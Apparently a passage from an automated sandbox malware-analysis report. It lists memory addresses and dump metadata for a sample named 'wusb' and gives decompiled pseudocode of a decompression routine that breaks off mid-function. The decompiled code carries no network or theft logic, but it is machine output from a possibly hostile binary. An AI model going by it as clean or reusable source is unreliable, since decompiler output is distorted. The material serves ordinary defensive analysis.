                                                        0x00406fe8
                                                        0x00406fec
                                                        0x00406fec
                                                        0x00407011
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406956
                                                        0x00406958
                                                        0x0040695b
                                                        0x004069cc
                                                        0x004069cf
                                                        0x004069d2
                                                        0x004069d9
                                                        0x004069e3
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x0040695d
                                                        0x00406961
                                                        0x00406964
                                                        0x00406966
                                                        0x00406969
                                                        0x0040696c
                                                        0x0040696e
                                                        0x00406971
                                                        0x00406973
                                                        0x00406978
                                                        0x0040697b
                                                        0x0040697e
                                                        0x00406982
                                                        0x00406989
                                                        0x0040698c
                                                        0x00406993
                                                        0x00406997
                                                        0x0040699f
                                                        0x0040699f
                                                        0x0040699f
                                                        0x00406999
                                                        0x00406999
                                                        0x00406999
                                                        0x0040698e
                                                        0x0040698e
                                                        0x0040698e
                                                        0x004069a3
                                                        0x004069a6
                                                        0x004069c4
                                                        0x004069c6
                                                        0x00000000
                                                        0x004069a8
                                                        0x004069a8
                                                        0x004069ab
                                                        0x004069ae
                                                        0x004069b1
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b3
                                                        0x004069b6
                                                        0x004069b9
                                                        0x004069bb
                                                        0x004069bc
                                                        0x004069bf
                                                        0x00000000
                                                        0x004069bf
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x004069ef
                                                        0x004069ef
                                                        0x004069f3
                                                        0x00407160
                                                        0x00000000
                                                        0x00407160
                                                        0x004069f9
                                                        0x004069fc
                                                        0x004069ff
                                                        0x00406a03
                                                        0x00406a06
                                                        0x00406a0c
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a0e
                                                        0x00406a11
                                                        0x00406a14
                                                        0x00406a14
                                                        0x00406a17
                                                        0x00406a1a
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a20
                                                        0x00406a26
                                                        0x00000000
                                                        0x00000000
                                                        0x00406a2c
                                                        0x00406a2c
                                                        0x00406a30
                                                        0x00406a33
                                                        0x00406a36
                                                        0x00406a39
                                                        0x00406a3c
                                                        0x00406a3d
                                                        0x00406a40
                                                        0x00406a42
                                                        0x00406a48
                                                        0x00406a4b
                                                        0x00406a4e
                                                        0x00406a51
                                                        0x00406a54
                                                        0x00406a57
                                                        0x00406a5a
                                                        0x00406a76
                                                        0x00406a79
                                                        0x00406a7c
                                                        0x00406a7f
                                                        0x00406a86
                                                        0x00406a8a
                                                        0x00406a8c
                                                        0x00406a90
                                                        0x00406a5c
                                                        0x00406a5c
                                                        0x00406a60
                                                        0x00406a68
                                                        0x00406a6d
                                                        0x00406a6f
                                                        0x00406a71
                                                        0x00406a71
                                                        0x00406a93
                                                        0x00406a9a
                                                        0x00406a9d
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa3
                                                        0x00000000
                                                        0x00406aa8
                                                        0x00406aa8
                                                        0x00406aac
                                                        0x0040716c
                                                        0x00000000
                                                        0x0040716c
                                                        0x00406ab2
                                                        0x00406ab5
                                                        0x00406ab8
                                                        0x00406abc
                                                        0x00406abf
                                                        0x00406ac5
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406ac7
                                                        0x00406aca
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406acd
                                                        0x00406ad3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ad5
                                                        0x00406ad8
                                                        0x00406adb
                                                        0x00406ade
                                                        0x00406ae1
                                                        0x00406ae4
                                                        0x00406ae7
                                                        0x00406aea
                                                        0x00406aed
                                                        0x00406af0
                                                        0x00406af3
                                                        0x00406b0b
                                                        0x00406b0e
                                                        0x00406b11
                                                        0x00406b14
                                                        0x00406b14
                                                        0x00406b17
                                                        0x00406b1b
                                                        0x00406b1d
                                                        0x00406af5
                                                        0x00406af5
                                                        0x00406afd
                                                        0x00406b02
                                                        0x00406b04
                                                        0x00406b06
                                                        0x00406b06
                                                        0x00406b20
                                                        0x00406b27
                                                        0x00406b2a
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00000000
                                                        0x00406b2c
                                                        0x00406b2a
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00406b31
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b6c
                                                        0x00406b6c
                                                        0x00406b70
                                                        0x00407178
                                                        0x00000000
                                                        0x00407178
                                                        0x00406b76
                                                        0x00406b79
                                                        0x00406b7c
                                                        0x00406b80
                                                        0x00406b83
                                                        0x00406b89
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8b
                                                        0x00406b8e
                                                        0x00406b91
                                                        0x00406b91
                                                        0x00406b97
                                                        0x00406b35
                                                        0x00406b35
                                                        0x00406b38
                                                        0x00000000
                                                        0x00406b38
                                                        0x00406b99
                                                        0x00406b99
                                                        0x00406b9c
                                                        0x00406b9f
                                                        0x00406ba2
                                                        0x00406ba5
                                                        0x00406ba8
                                                        0x00406bab
                                                        0x00406bae
                                                        0x00406bb1
                                                        0x00406bb4
                                                        0x00406bb7
                                                        0x00406bcf
                                                        0x00406bd2
                                                        0x00406bd5
                                                        0x00406bd8
                                                        0x00406bd8
                                                        0x00406bdb
                                                        0x00406bdf
                                                        0x00406be1
                                                        0x00406bb9
                                                        0x00406bb9
                                                        0x00406bc1
                                                        0x00406bc6
                                                        0x00406bc8
                                                        0x00406bca
                                                        0x00406bca
                                                        0x00406be4
                                                        0x00406beb
                                                        0x00406bee
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406bf0
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406fc2
                                                        0x00406fc2
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x0040703e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x0040703e
                                                        0x0040703e
                                                        0x00000000
                                                        0x00407044
                                                        0x0040703e
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00406b3b
                                                        0x00406b3b
                                                        0x00406b3f
                                                        0x00407184
                                                        0x00000000
                                                        0x00407184
                                                        0x00406b45
                                                        0x00406b48
                                                        0x00406b4b
                                                        0x00406b4e
                                                        0x00406b51
                                                        0x00406b54
                                                        0x00406b57
                                                        0x00406b59
                                                        0x00406b5c
                                                        0x00406b5f
                                                        0x00406b62
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00406b64
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00406d01
                                                        0x00406d01
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406d04
                                                        0x00406d04
                                                        0x00000000
                                                        0x00406d04
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9
                                                        0x004071f1
                                                        0x004071f1
                                                        0x00000000
                                                        0x004071f1
                                                        0x0040703e
                                                        0x00406fc5
                                                        0x00406fc2
                                                        0x00000000
                                                        0x00406bf9

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                        • Instruction ID: 5bbe2b58965c0beeac19dcf892031eaf3bd84ec3573d7bafdcb84a7f6e2b809b
                                                        • Opcode Fuzzy Hash: 00843b0969967e6d4f9cc830e58333b9624a019a99b12018acef51654acc7fa4
                                                        • Instruction Fuzzy Hash: 9A713471E04228DFDF28CFA8C9447ADBBB1FB44305F15806AE846BB280C7389996DF44
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00406D13 Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 98%
                                                        			E00406D13() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004071F9))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4)); // executed
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
